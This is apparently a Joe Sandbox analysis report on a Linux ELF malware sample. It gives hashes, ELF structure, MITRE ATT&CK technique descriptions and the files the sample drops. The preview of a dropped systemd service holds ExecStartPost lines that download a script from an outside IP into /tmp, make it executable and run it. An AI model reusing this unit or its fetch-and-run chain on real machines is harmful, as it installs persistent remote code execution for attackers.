MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.064804988275458
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
MD5:	8156A50E9D158639626649BD134E7D5D
SHA1:	D95D108656621F4B4F82B93CA0694D66F4A2FEF4
SHA-256:	FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
SHA-512:	DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.47604793028133
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	x86_32.nn.elf
File size:	95'984 bytes
MD5:	b6c87b436d8de600e1f8c7978a098739
SHA1:	610ffdd17efa2412f76de225cc4b33102653b85d
SHA256:	8b1aeae909258c79a17d2d0590cf857ec7713c2c5ec0e0995d9294b60e6d3e8b
SHA512:	fb66e28ea70ce7dcd1c7333010b3859de70f37f43d211edabd6dd3b558daec75ad8c4b539b3955d9b46503f75cfbacbb264857a8056b2f78109ea5303c25faaf
SSDEEP:	1536:0jCBx/DDCJtD7hfuSRGgnVBszm+3bR/FmW3qHjQVYrrWO33kEWrzJuS3yQR9c:0jCBxruJtfhGSRG733bR9mWaHjQVqrWa
TLSH:	12935BC0E9C3E4F1E90614321177E7368A72E67D1039FA57EF68A632FD42610A61779C
File Content Preview:	.ELF....................d...4...`u......4. ...(......................e...e...............p.......... ... +..........Q.td............................U..S.......wo...h.....4..[]...$.............U......= ....t..5....$......$.......u........t....h............

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	95584
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0x134e6	0x0	0x6	AX	16
.fini	PROGBITS	0x805b596	0x13596	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x805b5c0	0x135c0	0x2fdc	0x0	0x2	A	32
.ctors	PROGBITS	0x805f000	0x17000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x805f008	0x17008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x805f020	0x17020	0x500	0x0	0x3	WA	32
.bss	NOBITS	0x805f520	0x17520	0x2600	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x17520	0x3e	0x0	0x0		1

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x1659c	0x1659c	6.5998	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0x17000	0x805f000	0x805f000	0x520	0x2b20	5.4394	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Start time (UTC):	05:12:49
Start date (UTC):	13/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	/tmp/x86_32.nn.elf
File size:	95984 bytes
MD5 hash:	b6c87b436d8de600e1f8c7978a098739

Start time (UTC):	05:12:50
Start date (UTC):	13/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report x86_32.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: x86_32.nn.elf PID: 6238, Parent PID: 6162

General

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6253, Parent PID: 6238

General

Chronological Activities

Analysis Process: sh PID: 6253, Parent PID: 6238

General

Chronological Activities

Linux Analysis Report
x86_32.nn.elf